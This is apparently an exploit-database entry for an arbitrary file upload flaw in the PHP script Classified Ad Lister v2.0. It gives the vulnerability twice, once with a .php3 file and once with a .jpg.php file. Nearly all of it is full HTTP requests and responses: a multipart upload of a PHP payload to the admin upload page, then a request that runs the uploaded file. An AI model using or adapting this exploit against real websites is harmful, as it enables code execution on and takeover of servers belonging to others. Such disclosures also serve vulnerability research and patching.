===========================================================================================
# Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.netartmedia.net/adlister
# Software Link: https://www.netartmedia.net/adlister
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Classified Ad Lister is a free, responsive and easy
to install php script
 (not using any database, so the installation is as easy as copying the
files to the website or folder you prefer)
  which allows to manage and show classified or product listings on a
website.
===========================================================================================
# POC - Arbitrary File Upload
# Parameters : uploads
# POST Method :
http://localhost/classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3
# Injection Request
POST /classified/admin/upload.php HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 248
Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
Origin: http://localhost
Referer: http://localhost/classified/admin/index.php?page=add
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--0eaa6514f42e46cbb8d84e040ff20287
Content-Disposition: form-data; name="myfile[]";
filename="d571bf7952b140d4bff5d1c272e9c992.php3"
Content-Type: application/octet-stream

<?php print(int)0xFFF9999-24 ?>
--0eaa6514f42e46cbb8d84e040ff20287--

# Identification Page
GET /classified/admin/uploads/d571bf7952b140d4bff5d1c272e9c992.php3 HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

# Injection Response
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 41
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT

["d571bf7952b140d4bff5d1c272e9c992.php3"]

# Identification Page
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Classified Ad Lister v2.0 - 'uploads' Arbitrary File Upload
# Dork: N/A
# Date: 25-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.netartmedia.net/adlister
# Software Link: https://www.netartmedia.net/adlister
# Version: v2.0
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Classified Ad Lister is a free, responsive and easy
to install php script
 (not using any database, so the installation is as easy as copying the
files to the website or folder you prefer)
  which allows to manage and show classified or product listings on a
website.
===========================================================================================
# POC - Arbitrary File Upload
# Parameters : uploads
# POST Method :
http://localhost/classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php
# Injection Request
POST /classified/admin/upload.php HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 251
Content-Type: multipart/form-data; boundary=0eaa6514f42e46cbb8d84e040ff20287
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
Origin: http://localhost
Referer: http://localhost/classified/admin/index.php?page=add
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

--0eaa6514f42e46cbb8d84e040ff20287
Content-Disposition: form-data; name="myfile[]";
filename="ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"
Content-Type: application/octet-stream

<?php print(int)0xFFF9999-24 ?>
--0eaa6514f42e46cbb8d84e040ff20287--

# Identification Page
GET /classified/admin/uploads/ad14667cae5d4e28bfb5b53df1687ed6.jpg.php
HTTP/1.1
Host: localhost
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie:
AuthUser=administrator%7Eda1907216877e31462c14b35db67de32%7E1553706661;
PHPSESSID=banppj2nuinahv1v8itb1c1nan
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/54.0.2840.99 Safari/537.36

# Injection Response
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 44
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT

["ad14667cae5d4e28bfb5b53df1687ed6.jpg.php"]

# Identification Page
HTTP/1.1 200 OK
Server: Apache/2.4.37 (Win64) PHP/7.2.14
X-Powered-By: PHP/7.2.14
Content-Length: 9
Content-Type: text/html; charset=UTF-8
Date: Wed, 27 Mar 2019 14:46:40 GMT
===========================================================================================